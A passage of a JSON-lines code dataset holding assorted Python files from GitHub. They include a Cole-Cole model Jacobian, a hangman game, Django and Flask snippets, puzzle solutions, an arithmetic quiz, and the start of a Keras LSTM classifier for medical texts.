\"\"\"\n self._set_parameters(pars)\n # term1\n nom1 = - self.m * np.sin(self.ang) * self.w ** self.c *\\\n self.c * self.tau ** (self.c - 1)\n term1 = nom1 / self.denom\n\n # term2\n nom2 = (self.m * self.otc * np.sin(self.ang)) *\\\n (2 * self.w ** self.c * self.c * self.tau ** (self.c - 1) *\n np.cos(self.ang) + 2 * self.c * self.w ** (2 * self.c) *\n self.tau ** (2 * self.c - 1))\n term2 = nom2 / self.denom ** 2\n\n result = term1 + term2\n result *= self.rho0\n return result\n\n def dim_dlog10tau(self, pars):\n lin_resp = self.dim_dtau(pars)\n result = np.log(10) * self.tau * lin_resp\n return result\n\n def dim_dc(self, pars):\n r\"\"\"\n :math:`\\frac{\\partial \\hat{\\rho''}(\\omega)}{\\partial c} = \\rho_0\n \\frac{-m sin(\\frac{c \\pi}{2}) ln(\\omega \\tau)(\\omega \\tau)^c - m\n (\\omega \\tau)^c \\frac{\\pi}{2} cos(\\frac{\\pi}{2}}{1 + 2 (\\omega \\tau)^c\n cos(\\frac{c \\pi}{2}) + (\\omega \\tau)^{2 c}} + \\rho_0 \\frac{\\left[-m\n (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) \\right] \\cdot \\left[ -2 ln(\\omega\n \\tau) (\\omega \\tau)^c cos(\\frac{c \\pi}{2}) + 2 (\\omega \\tau)^c\n \\frac{\\pi}{2} cos(\\frac{c \\pi}{2}) \\right] + \\left[2 ln(\\omega \\tau)\n (\\omega \\tau)^{2 c}\\right]}{\\left[1 + 2 (\\omega \\tau)^c cos(\\frac{c\n \\pi}{2}) + (\\omega \\tau)^{2 c}\\right]^2}`\n \"\"\"\n self._set_parameters(pars)\n # term1\n nom1a = - self.m * np.log(self.w * self.tau) * self.otc *\\\n np.sin(self.ang)\n nom1b = - self.m * self.otc * (np.pi / 2.0) * np.cos(self.ang)\n term1 = (nom1a + nom1b) / self.denom\n\n # term2\n nom2 = (self.m * self.otc * np.sin(self.ang)) *\\\n (2 * np.log(self.w * self.tau) * self.otc * np.cos(self.ang) -\n 2 * self.otc * (np.pi / 2.0) * np.sin(self.ang) +\n 2 * np.log(self.w * self.tau) * self.otc2)\n term2 = nom2 / self.denom ** 2\n result = term1 + term2\n\n result *= self.rho0\n return result\n\n def Jacobian_re_im(self, pars):\n r\"\"\"\n :math:`J`\n\n >>> import sip_models.res.cc as cc\n >>> import numpy as np\n >>> f = np.logspace(-3, 3, 20)\n >>> pars = [100, 0.1, 0.04, 0.8]\n >>> obj = cc.cc(f)\n >>> J = obj.Jacobian_re_im(pars)\n \"\"\"\n partials = []\n\n # partials.append(self.dre_dlog10rho0(pars)[:, np.newaxis, :])\n partials.append(self.dre_drho0(pars)[:, np.newaxis])\n partials.append(self.dre_dm(pars))\n # partials.append(self.dre_dlog10tau(pars))\n partials.append(self.dre_dtau(pars))\n partials.append(self.dre_dc(pars))\n # partials.append(self.dim_dlog10rho0(pars)[:, np.newaxis, :])\n partials.append(self.dim_drho0(pars)[:, np.newaxis])\n partials.append(self.dim_dm(pars))\n # partials.append(self.dim_dlog10tau(pars))\n partials.append(self.dim_dtau(pars))\n partials.append(self.dim_dc(pars))\n\n print('SHAPES')\n for x in partials:\n print(x.shape)\n\n J = np.concatenate(partials, axis=1)\n return J\n","repo_name":"m-weigand/sip_models","sub_path":"lib/sip_models/res/cc.py","file_name":"cc.py","file_ext":"py","file_size_in_byte":13471,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26239500912","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 8 20:22:38 2019\r\n\r\n@author: Kay\r\n\"\"\"\r\n\r\nfrom random import *\r\n\r\nplayer_score = 0;\r\ncomputer_score = 0;\r\n\r\ndef hangedman(hangman) :\r\n graphic = [\r\n \"\"\"\r\n +-------+\r\n |\r\n |\r\n |\r\n |\r\n |\r\n --------------\r\n --------------\r\n \"\"\"\r\n ,\r\n \"\"\" \r\n +-------+\r\n | |\r\n | O \r\n |\r\n |\r\n |\r\n --------------\r\n --------------\r\n \"\"\",\r\n \"\"\" \r\n +-------+\r\n | |\r\n | O \r\n | |\r\n |\r\n |\r\n --------------\r\n --------------\r\n \"\"\",\r\n \"\"\" \r\n +-------+\r\n | |\r\n | O \r\n | -|\r\n |\r\n |\r\n --------------\r\n --------------\r\n \"\"\",\r\n \"\"\" \r\n +-------+\r\n | |\r\n | O \r\n | -|-\r\n |\r\n |\r\n --------------\r\n --------------\r\n \"\"\",\r\n \"\"\" \r\n +-------+\r\n | |\r\n | O \r\n | -|-\r\n | /\r\n |\r\n --------------\r\n --------------\r\n \"\"\",\r\n \"\"\"\r\n +-------+\r\n | |\r\n | O \r\n | -|-\r\n | / \\\r\n |\r\n --------------\r\n --------------\r\n \"\"\"]\r\n \r\n print(graphic[hangman])\r\n return\r\n\r\ndef start() :\r\n print(\"Let's play a game of Hangman.\")\r\n #'game()' calls the game function and starts the actual game.\r\n while game() : \r\n pass; #Keeps track of the scores until the game is finished.\r\n scores(); #Once the game is completed it'll return the scores\r\n \r\ndef game() :\r\n dictionary = [\"anata\", \"baka\", \"namae\", \"boku\", \"mina\"];\r\n \r\n word = choice(dictionary); #Choose random number and call word based on index number. 'choice' comes from random import\r\n word_length = len(word);\r\n clue = word_length * [\"_\"]; #For each letter print '_'\r\n \r\n tries = 6; #Sets the amount of tries the user gets.\r\n letters_tried = \"\";\r\n guesses = 0; #Guesses by default should be 0.\r\n letters_right = 0;\r\n letters_wrong = 0;\r\n \r\n global computer_score, player_score;\r\n \r\n while (letters_wrong != tries) and (\"\".join(clue) != word): #This basically says if the user didn't use up their tries and if there clue slot is not filled run function. \r\n letter = guess_letter(); #Calls function (guess_letter) code-line[146]\r\n if len(letter) == 1 and letter.isalpha(): #If the length returned is equal to 1 and is alphabetical then run function.\r\n if letters_tried.find(letter) != -1: #If you've entered a letter more than once it'll look though the string you entered and if its there it'll return the message.\r\n print(\"You've already picked\", letter);\r\n else:\r\n letters_tried = letters_tried + letter; #Adds the letters the user entered to the letters tried var.\r\n first_index = word.find(letter) #It looks at the first letter(the lowest value being index 0) of the returned string. If it's not the same it returns the int -1.tr\r\n if first_index == -1: #If the string returns the value -1 run function.\r\n letters_wrong += 1; #Adds a number to the letters wrong. Remeber once the numbers add up to the same value of the guesses its game over.\r\n print(\"Sorry,\",letter,\"isn't what we're looking for.\");\r\n else:\r\n print(\"Congradulations\" ,letter, \"is correct.\"); #Prints if the user got something correct.\r\n for i in range(word_length): #Loops through the array for each letter\r\n if letter == word[i]: #If the letter matches with any letter in the array 'word'(The correct word) the function runs.\r\n clue[i] = letter; #The letter will replace the clue(_) so this is replaced by the index. Example (____) the correct word is (mina). Index[1] is replaced so this will return (_i__).\r\n else:\r\n print(\"Choose another.\"); #Returns if the entered value is not a string.\r\n hangedman(letters_wrong) #Calls the graphic array and passes the number of letters the user got wrong in it. The numbers passed are used as an index to the array.\r\n print(\"\".join(clue)); #Adds the letters the user got correct to the clue(_i__).\r\n print(\"Guesses\", letters_tried); #Displays the letters the user already tried.\r\n\r\n if letters_wrong == tries: #If the user doesn't have any turns left the function will run.\r\n print(\"Game Over.\");\r\n print(\"The word was: \",word);\r\n computer_score += 1; #Adds 1 score to the computer total.\r\n break; #Breaks through the game loop.\r\n if \"\".join(clue) == word: #If the clue matches the correct word the function will run.\r\n print(\"You win!\");\r\n print(\"The word was: \", word);\r\n player_score += 1; #Adds 1 score to the player/user total.\r\n break; #Adds 1 score to the computer total.\r\n return play_again() #Returns function that asks user if they wish to play again or not.\r\n\r\ndef guess_letter() :\r\n letter = input(\"Take a guess at our mystery word: \")\r\n letter.strip(); \r\n letter.lower() #Makes the user input lowercase.\r\n return letter #returns the processed user input.\r\n\r\ndef play_again() :\r\n answer = input(\"Would you like to play again? y/n: \")\r\n if answer in (\"y\", \"Y\", \"yes\", \"Yes\", \"Of course!\"):\r\n return answer #If a value is returned the game will continue.\r\n else:\r\n print(\"Thank you very much for playing our game. See you next time! \\n\")\r\n \r\ndef scores() : #Calls once game is completed.\r\n global player_score, computer_score #Calls vars\r\n print(\"HIGH SCORES\")\r\n print(\"Player: \", player_score)\r\n print(\"Computer: \",computer_score)\r\n\r\nif __name__ == '__main__' : #Allows thoe code to be called using cmd and if importing code won't run automatically\r\n start()","repo_name":"Enrico-Samuels2200/My-Python-Projects","sub_path":"Hangman/Hangman.py","file_name":"Hangman.py","file_ext":"py","file_size_in_byte":6605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18140981688","text":"from point import Point\n\nclass Line():\n '''Line from pointA to pointB\n leftmost point is pointA, and rightmost point is pointB\n '''\n def __init__(self, pointA, pointB):\n if(pointA.x <= pointB.x):\n self.pointA = pointA\n self.pointB = pointB\n else:\n self.pointA = pointB\n self.pointB = pointA\n if(pointB.x - pointA.x != 0):\n self.slope = (pointB.y - pointA.y) / (pointB.x - pointA.x)\n else:\n self.slope = 9999999 #None is infinite slopes\n self.intercept = pointB.y - self.slope*pointB.x\n\n def checkPointWithinLineSegmentIfPointIsOnLine(self, point):\n print(\"IT IS WITHIN THIS LINE\")\n if(self.slope >= 0): #Positive Slope\n return (self.pointA.x <= point.x and point.x <= self.pointB.x) and (self.pointA.y <= point.y and point.y <= self.pointB.y)\n else: #Negative Slope\n return (self.pointA.x <= point.x and point.x <= self.pointB.x) and (\n self.pointA.y >= point.y and point.y >= self.pointB.y)\n def evaluate(self, x):\n return x*self.slope + self.intercept","repo_name":"harman666666/Algorithms-Data-Structures-and-Design","sub_path":"Other Practice/Crack the Coding Interview Algorithms/Auxillary/intersection/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33581603209","text":"# I have created this file - Deep\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\n#def index(request):\n # return HttpResponse(\"\"\"
    \"\"\")\n#def about(request):\n# return HttpResponse(\"\"\"

    That's My Portfolio

    \"\"\")\ndef index(request):\n return render(request,'index.html')\ndef about(request):\n return render(request, 'about.html')\ndef contact(request):\n return render(request,'contact.html')\n\n #return HttpResponse(\"Home\")\ndef analyze(request):\n #get the text\n djtext=request.POST.get('text', 'default')\n #check box value\n removepunc = request.POST.get('removepunc', 'off')\n fullcaps=request.POST.get('fullcaps','off')\n newlineremover = request.POST.get('newlineremover', 'off')\n extraspaceremover = request.POST.get('extraspaceremover', 'off')\n charactercounter=request.POST.get('charactercounter', 'off')\n #print(removepunc,\"\\n\",djtext)\n #analyze the text\n #analyzed=djtext\n if removepunc==\"on\":\n punctuations = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~'''\n analyzed=\"\"\n for char in djtext:\n if char not in punctuations:\n analyzed=analyzed+char\n params={'purpose':'Removed Punctuations', 'analyzed_text':analyzed}\n djtext=analyzed\n #return render(request, 'analyze.html', params)\n if fullcaps==\"on\":\n analyzed=\"\"\n for char in djtext:\n analyzed+=char.upper()\n params = {'purpose': 'Changed to Uppercase', 'analyzed_text': analyzed}\n djtext=analyzed\n #return render(request, 'analyze.html', params)\n if newlineremover=='on':\n analyzed = \"\"\n for char in djtext:\n if char!=\"\\n\" and char!=\"\\r\":\n analyzed += char\n params = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}\n djtext=analyzed\n #return render(request, 'analyze.html', params)\n if extraspaceremover=='on':\n analyzed = \"\"\n for index,char in enumerate(djtext):\n if not(djtext[index]==\" \" and djtext[index+1]==\" \"):\n analyzed += char\n params = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}\n djtext=analyzed\n #return render(request, 'analyze.html', params)\n if charactercounter=='on':\n analyzed = 0\n for index,char in enumerate(djtext):\n if not(djtext[index]==\" \"):\n analyzed += 1\n params = {'purpose': 'Character Count', 'analyzed_text': analyzed}\n djtext=analyzed\n\n return render(request,'analyze.html',params)","repo_name":"dynamitedeeps/textutils","sub_path":"textutils/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71561393709","text":"from flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField\nfrom wtforms.validators import DataRequired, StopValidation\nfrom twitter import search_user\n\n\nclass ValidateId(object):\n \"\"\"\n Validates that the user Twitters id exists. This validator will stop the\n validation chain on error.\n :param message:\n Error message to raise in case of a validation error.\n \"\"\"\n field_flags = ('required', )\n\n def __init__(self, message=None):\n self.message = message\n\n def __call__(self, form, field):\n if not search_user(field.data):\n if self.message is None:\n self.message = field.gettext('Wrong twitter user.')\n\n field.errors[:] = []\n raise StopValidation(self.message)\n\n\nclass UserIdForm(FlaskForm):\n username = StringField('User id', validators=[DataRequired(), ValidateId()])\n submit = SubmitField('Create map')\n","repo_name":"LiiaDulher/friends_map","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3904543952","text":"from django.conf import settings\nfrom django.db import models\nfrom django.db.models.signals import post_save\n\nfrom .utils import code_generator\n\n# Create your models here.\n\nUser = settings.AUTH_USER_MODEL\n\nclass MemberManager(models.Manager):\n\tdef toggle_follow(self, request_user, username_to_toggle):\n\t\tmember_ = Member.objects.get(user__username__iexact=username_to_toggle)\n\t\tuser = request_user\n\t\tis_following = False\n\t\tif user in member_.followers.all():\n\t\t\tmember_.followers.remove(user)\n\t\telse:\n\t\t\tmember_.followers.add(user)\n\t\t\tis_following = True\n\t\treturn member_, is_following\n\nclass Member(models.Model):\n\tuser \t\t\t= models.OneToOneField(User) #user.all()\n\tfollowers\t\t= models.ManyToManyField(User, related_name='is_following', blank=True) #users.follower.all()\n\t#following\t\t= models.ManyToManyField(User, related_name='following', blank=True) #users.following.all()\n\tactivation_key\t= models.CharField(max_length=120, blank=True, null=True)\n\tactivated\t\t= models.BooleanField(default=False)\n\ttimestamp \t\t= models.DateTimeField(auto_now_add=True)\n\tupdated\t\t\t= models.DateTimeField(auto_now=True)\n\n\tobjects = MemberManager()\n\n\tdef __str__(self):\n\t\treturn self.user.username\n\n\tdef send_activation_email(self):\n\t\tif not self.activated:\n\t\t\tself.activation_key = code_generator()\n\t\t\tself.save()\n\t\t\tsent_mail = False\n\t\t\treturn sent_mail\n\t\t\t#send mail\n\ndef post_save_user_receiver(sender, instance, created, *args, **kwargs):\n\tif created:\n\t\tmember, is_created = Member.objects.get_or_create(user=instance)\n\t\tdefault_user_member = Member.objects.get_or_create(user__id=1)[0] #user__usernam=\n\t\t#assign new signups as follower of firstuser (user__id=1), since it is a tuple, use [0]\n\t\tdefault_user_member.followers.add(instance)\n\t\t#assign to follow a new signup using firstuser\n\t\tmember.followers.add(default_user_member.user)\n\t\tmember.followers.add(2)\n\npost_save.connect(post_save_user_receiver, sender=User)\t\t","repo_name":"raintapper/inniin","sub_path":"src/members/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38059430848","text":"f = open(\"input.txt\", \"r\").readlines()\n\ntotal_ribbon = 0\n\nfor line in f:\n dimensions = line.split('x')\n dimensions = [float(dimensions[0]), float(dimensions[1]), float(dimensions[2])]\n\n wrap = 0\n bow = 1\n crossedMaxDimension = False\n\n for dimension in dimensions:\n if dimension != max(dimensions) or crossedMaxDimension == True:\n wrap += 2 * dimension\n else:\n crossedMaxDimension = True\n bow *= dimension\n\n total_ribbon += wrap + bow\n\nprint('The elves should order ' + str(total_ribbon) + ' square feet of wrapping paper.')\n","repo_name":"huggo-42/advent_of_code.2015","sub_path":"day-2/solution_part2.py","file_name":"solution_part2.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69939043629","text":"import string\n\ndef getRucksacksPriority(lines,alphabet):\n totalPriority=0\n for line in lines:\n splittedString = [line[:len(line)//2],line[len(line)//2:].strip()]\n for i in splittedString[0]:\n if(getDuplicated(i,splittedString)):\n totalPriority+=alphabet.index(i)+1\n break\n return totalPriority\n\ndef getGroupPriority(lines,alphabet):\n \n groupsPriority = 0\n groupString = []\n for i, line in enumerate(lines, start=1):\n groupString.append(line.strip())\n if(i%3==0):\n groupsPriority+=alphabet.index(getDuplicatedInGroup(i,groupString))+1\n groupString = []\n\n return groupsPriority \n\ndef getDuplicatedInGroup(i,groupString):\n for element in groupString:\n for i in groupString[0]:\n for j in groupString[1]:\n if(i==j):\n for k in groupString[2]:\n if(i==k):\n return i\n\ndef getDuplicated(i,splittedString):\n for j in splittedString[1]:\n if(i==j):\n return True\n\nalphabet = list(string.ascii_lowercase+string.ascii_uppercase)\n\nf = open(\"./input.txt\", \"r\")\nlines = f.readlines()\n \nprint(\"Solution 1:\",getRucksacksPriority(lines,alphabet))\nprint(\"Solution 2:\",getGroupPriority(lines,alphabet))\n","repo_name":"GabriRDiaz/AdventOfCode22","sub_path":"Day3/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14712366775","text":"\"\"\"\nLearn how to handle input and output, employ the random number generator, \nand write the output to a file.\nMany people are fond of interactive learning. In this project, you will learn \nhow to write an application that can facilitate solving arithmetic operations in \na quick manner. The application will generate a mathematical expression for a user \nto solve. Implement various levels of difficulty and let the application save the \nresults and show the progress of learning.\n\"\"\"\nimport random\n\n\ndef generate_simple_ops() -> tuple:\n return random.randint(2, 9), random.choice([\"+\", \"-\", \"*\"]), random.randint(2, 9)\n\n\ndef generate_integral_square() -> int:\n return random.randint(11, 29)\n\n\ndef menu():\n print(\"Which level do you want? Enter a number:\")\n print(\"1 - simple operations with numbers 2-9\")\n print(\"2 - integral squares of 11-29\")\n\n\ndef integer_square():\n n = 5\n mark = 0\n while n > 0:\n n -= 1\n task = generate_integral_square()\n while True:\n print(task)\n square = input()\n if square.isdigit():\n break\n else:\n print(\"Wrong format! Try again.\")\n if (task ** 2) == int(square):\n print(\"Right!\")\n mark += 1\n else:\n print(\"Wrong!\")\n return mark\n\n\ndef simple_operations():\n n = 5\n mark = 0\n while n > 0:\n n -= 1\n a, operand, b = generate_simple_ops()\n print(f\"{a} {operand} {b}\")\n while True:\n answer = input()\n if answer.isdigit():\n break\n elif answer.startswith('-'):\n break\n else:\n print(\"Incorrect format.\")\n result = int(answer)\n if operand == \"+\":\n if result == a + b:\n print(\"Right!\")\n mark += 1\n else:\n print(\"Wrong!\")\n if operand == \"-\":\n if result == a - b:\n print(\"Right!\")\n mark += 1\n else:\n print(\"Wrong!\")\n if operand == \"*\":\n if result == a * b:\n print(\"Right!\")\n mark += 1\n else:\n print(\"Wrong!\")\n return mark\n\n\ndef save_file(name, mark, level=None):\n with open('results.txt', 'a') as f:\n if level == 1:\n result = f\"{name}: {mark}/5 in level {level} (simple operations with numbers 2-9).\"\n else:\n result = f\"{name}: {mark}/5 in level {level} (integral squares of 11-29).\"\n f.write(result + '\\n')\n\n\ndef main():\n mark = 0\n while True:\n menu()\n choice = int(input())\n if choice == 1 or choice == 2:\n break\n else:\n print(\"Incorrect format.\")\n\n if choice == 1:\n mark = simple_operations()\n if choice == 2:\n mark = integer_square()\n\n save_or_not = input(f\"Your mark is {mark}/5. Would you like to save the result? Enter yes or no.\\n\")\n if save_or_not in [\"yes\", \"YES\", \"y\", \"Yes\"]:\n name = input(\"What is your name?\\n\")\n save_file(name, mark, choice)\n print('The results are saved in \"results.txt\".')\n\n\nif __name__ == '__main__':\n main()","repo_name":"biramendoye/python-exercices","sub_path":"src/arithmetic.py","file_name":"arithmetic.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17089084085","text":"class Solution:\n def assignBikes(self, workers: List[List[int]], bikes: List[List[int]]) -> List[int]:\n n, m = len(workers), len(bikes)\n dist = []\n for i in range(n):\n for j in range(m):\n dist.append([abs(workers[i][0] - bikes[j][0]) + abs(workers[i][1] - bikes[j][1]), i, j])\n dist.sort()\n row, col = set(), set()\n ans = [0]*n\n co = 0\n for wt, r, c in dist:\n if r not in row and c not in col:\n ans[r] = c\n row.add(r)\n col.add(c)\n co += 1\n \n if co == n:\n return ans\n return ans","repo_name":"mrprashantkumar/LeetCode-Submissions-Python","sub_path":"campus-bikes/campus-bikes.py","file_name":"campus-bikes.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"39738241088","text":"import pickle\r\nfrom keras.layers import LSTM, Input, Embedding, Dense, Dropout, Masking\r\nfrom keras.models import Model\r\nimport numpy as np\r\nimport os\r\nfrom random import shuffle\r\nimport matplotlib.pyplot as plt\r\nfrom keras.callbacks import TensorBoard, ModelCheckpoint\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nimport re\r\nfrom nltk.corpus import stopwords\r\n\r\nmaxlen = 487\r\n# 38892\r\nvocab_num = 38892\r\nembed_dim = 512\r\nepochs = 50\r\nbatch_size = 100\r\nsave_dir = './models/medical/model_01/'\r\n\r\nlabels = ['Arthroskopie', 'Bundesgesundheitsblatt', 'DerAnaesthesist', 'DerChirurg', 'DerGynaekologe', 'DerHautarzt',\r\n 'DerInternist', 'DerNervenarzt', 'DerOpthalmologe', 'DerOrthopaede', 'DerPathologe', 'DerRadiologe',\r\n 'DerSchmerz', 'DerUnfallchirurg', 'DerUrologeA', 'EthikInDerMedizin', 'ForumDerPsychoanalyse',\r\n 'Gefaesschirurgie', 'Herz', 'Herzschrittmachertherapie', 'HNO', 'IntensiveMedizin',\r\n 'KlinischeNeuroradiologie', 'ManuelleMedizin', 'MedizinischeKlinik', 'MonatsschriftKinderheilkunde',\r\n 'MundKieferGesichtschirurgie', 'Notfall+Rettungsmedizin', 'OperativeOrthopaedie', 'PerinatalMedizin',\r\n 'Psychotherapeut', 'Rechtsmedizin', 'Reproduktionsmedizin', 'Strahlentherapie+Onkologie',\r\n 'Trauma+Berufskrankheit', 'ZfuerGerontologie+Geriatrie', 'ZfuerHerzThoraxGefaesschirurgie',\r\n 'ZfuerKardiologie', 'ZfuerRheumatologie']\r\nstopwords_eng = stopwords.words('english')\r\n\r\n\r\ndef split_data():\r\n\twith open('wordlist_label.pkl', 'rb') as f:\r\n\t\tx = pickle.load(f)\r\n\t\ty = x[1]\r\n\t\tx = x[0]\r\n\t\tx = [[w for w in s if w not in stopwords_eng]for s in x]\r\n\t\tf.close()\r\n\t\tlength = [len(s) for s in x]\r\n\t\tprint(max(length))\r\n\tz = list(zip(x, y))\r\n\tz.sort(key=lambda t:t[1])\r\n\ttrain = []\r\n\ttest = []\r\n\tcn = [0 for l in labels]\r\n\tfor l in y:\r\n\t\tcn[labels.index(l)] += 1\r\n\r\n\tfor i in range(len(labels)):\r\n\t\ts = cn[i] // 5\r\n\t\tif s == 0:\r\n\t\t\ts = 1\r\n\t\tn = 0\r\n\t\tfor xy in z:\r\n\t\t\tif xy[1] == labels[i]:\r\n\t\t\t\tif n < s:\r\n\t\t\t\t\ttest.append(xy)\r\n\t\t\t\telse:\r\n\t\t\t\t\ttrain.append(xy)\r\n\t\t\t\tn += 1\r\n\ttrain_x = [xy[0] for xy in train]\r\n\ttrain_y = [xy[1] for xy in train]\r\n\ttest_x = [xy[0] for xy in test]\r\n\ttest_y = [xy[1] for xy in test]\r\n\tprint(train_x[0])\r\n\twith open('./dataset/medical_splited_wordlists.pkl', 'wb') as f:\r\n\t\tpickle.dump([train_x, train_y, test_x, test_y], f)\r\n\t\tf.close()\r\n\r\n\r\ndef process_data():\r\n\twith open('./dataset/medical_splited_wordlists.pkl', 'rb') as f:\r\n\t\ttrain_x, train_y, test_x, test_y = pickle.load(f)\r\n\t\tf.close()\r\n\r\n\t# y = [labels.index(label) for label in y]\r\n\t# y = np.eye(39)[y]\r\n\t# x = np.array(x)\r\n\t# return 1\r\n\t# print(x.shape)\r\n\t# print(y.shape)\r\n\t# pickle.dump([x, y], open('./dataset/medical_unsplited', 'wb'))\r\n\r\n\treturn 1\r\n\r\n\r\ndef load_data():\r\n\ttrain_x, train_y, test_x, test_y = pickle.load(open('./dataset/medical_splited_wordlists.pkl', 'rb'))\r\n\ttrain_x, test_x = pickle.load(open('./dataset/medical_word_vecs.pkl', 'rb'))\r\n\r\n\tul = ['Notfall+Rettungsmedizin', 'MedizinischeKlinik', 'Strahlentherapie+Onkologie', 'Trauma+Berufskrankheit',\r\n\t\t 'PerinatalMedizin', 'EthikInDerMedizin', 'OperativeOrthopaedie', 'KlinischeNeuroradiologie', 'DerInternist',\r\n\t\t 'Psychotherapeut', 'Gefaesschirurgie', 'Rechtsmedizin', 'Arthroskopie', 'ZfuerHerzThoraxGefaesschirurgie',\r\n\t\t 'Herzschrittmachertherapie', 'Bundesgesundheitsblatt', 'Reproduktionsmedizin', 'Herz', 'ManuelleMedizin',\r\n\t\t 'ForumDerPsychoanalyse']\r\n\ttrain_y = train_y.tolist()\r\n\ttest_y = test_y.tolist()\r\n\ttrain_x = train_x.tolist()\r\n\ttest_y = test_y.tolist()\r\n\r\n\ttrain_x = pad_sequences(train_x, maxlen=maxlen, dtype='float16')\r\n\ttest_x = pad_sequences(test_x, maxlen=maxlen, dtype='float16')\r\n\ttrain_y = [labels.index(label) for label in train_y]\r\n\ttest_y = [labels.index(label) for label in test_y]\r\n\ttrain_y = np.eye(len(labels))[train_y]\r\n\ttest_y = np.eye(len(labels))[test_y]\r\n\treturn train_x, train_y, test_x, test_y\r\n\r\n\r\ndef create_model():\r\n\tx = Input(shape=(maxlen, embed_dim))\r\n\tembed = Masking(mask_value=0.)(x)\r\n\tlstm = LSTM(256, dropout=0.25)(embed)\r\n\tdense_1 = Dense(64, activation='relu')(lstm)\r\n\tdense_1 = Dropout(0.2)(dense_1)\r\n\tdense_2 = Dense(32, activation='relu')(dense_1)\r\n\tdense_2 = Dropout(0.25)(dense_2)\r\n\ty = Dense(len(labels), activation='softmax')(dense_2)\r\n\tmodel = Model(x, y)\r\n\treturn model\r\n\r\n\r\ndef get_model(is_train=True):\r\n\ttrain_x, train_y, test_x, test_y = load_data()\r\n\tprint(train_x.shape, train_y.shape)\r\n\tprint(test_x.shape, test_y.shape)\r\n\r\n\tmodel = create_model()\r\n\tmodel.summary()\r\n\r\n\timport tensorflow as tf\r\n\timport keras.backend.tensorflow_backend as KTF\r\n\r\n\tconfig = tf.ConfigProto()\r\n\tconfig.gpu_options.allow_growth = True # 不全部占满显存, 按需分配\r\n\tsess = tf.Session(config=config)\r\n\tKTF.set_session(sess) # 设置session\r\n\r\n\tif is_train:\r\n\t\tif not os.path.exists(save_dir):\r\n\t\t\tos.makedirs(save_dir)\r\n\t\tmodel.compile('adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\n\t\tcheckpoit = ModelCheckpoint(filepath=save_dir + '_trained_best_model.h5', monitor='val_acc',\r\n\t\t\t\t\t\t\t\t\tsave_best_only='True', mode='max', period=1)\r\n\t\ttensorboard = TensorBoard(log_dir=save_dir + '/log')\r\n\t\tcallback_lists = [tensorboard, checkpoit] # 因为callback是list型,必须转化为list\r\n\r\n\t\thistory = model.fit(train_x, train_y, validation_data=[test_x, test_y], batch_size=batch_size,\r\n\t\t\t\t\t\t\tepochs=epochs, callbacks=callback_lists)\r\n\t\tmodel.save_weights(save_dir + '_trained_model.h5')\r\n\r\n\t\tfig = plt.figure() # 新建一张图\r\n\t\tplt.plot(history.history['acc'], label='training acc')\r\n\t\tplt.plot(history.history['val_acc'], label='val acc')\r\n\t\tplt.title('model accuracy')\r\n\t\tplt.ylabel('accuracy')\r\n\t\tplt.xlabel('epoch')\r\n\t\tplt.legend(loc='lower right')\r\n\t\tfig.savefig(save_dir + '_acc.png')\r\n\t\tfig = plt.figure()\r\n\t\tplt.plot(history.history['loss'], label='training loss')\r\n\t\tplt.plot(history.history['val_loss'], label='val loss')\r\n\t\tplt.title('model loss')\r\n\t\tplt.ylabel('loss')\r\n\t\tplt.xlabel('epoch')\r\n\t\tplt.legend(loc='upper right')\r\n\t\tfig.savefig(save_dir + '_loss.png')\r\n\telse:\r\n\t\tmodel.load_weights(save_dir + '_trained_model.h5')\r\n\treturn model, [train_x, train_y, test_x, test_y]\r\n\r\n\r\ndef test_model(model, test_x, test_y):\r\n\ty_pre = model.predict(test_x)\r\n\ty_pre = y_pre.tolist()\r\n\ty_pre = [s.index(max(s)) for s in y_pre]\r\n\ttest_y = test_y.tolist()\r\n\ttest_y = [s.index(max(s)) for s in test_y]\r\n\r\n\tp = []\r\n\tr = []\r\n\tf1 = []\r\n\ttp_sum = 0\r\n\tfp_sum = 0\r\n\tfn_sum = 0\r\n\tfor cat in range(len(labels)):\r\n\t\ttp = 0\r\n\t\ttn = 0\r\n\t\tfp = 0\r\n\t\tfn = 0\r\n\t\tfor pre, true in zip(y_pre, test_y):\r\n\t\t\tif true == cat:\r\n\t\t\t\tif pre == true:\r\n\t\t\t\t\ttp += 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tfn += 1\r\n\t\t\telse:\r\n\t\t\t\tif pre == cat:\r\n\t\t\t\t\tfp += 1\r\n\t\t\t\telse:\r\n\t\t\t\t\ttn += 1\r\n\t\t# print(tp, tn, fp, fn)\r\n\t\tif tp + fp == 0:\r\n\t\t\tprecision = 0\r\n\t\telse:\r\n\t\t\tprecision = tp / (tp + 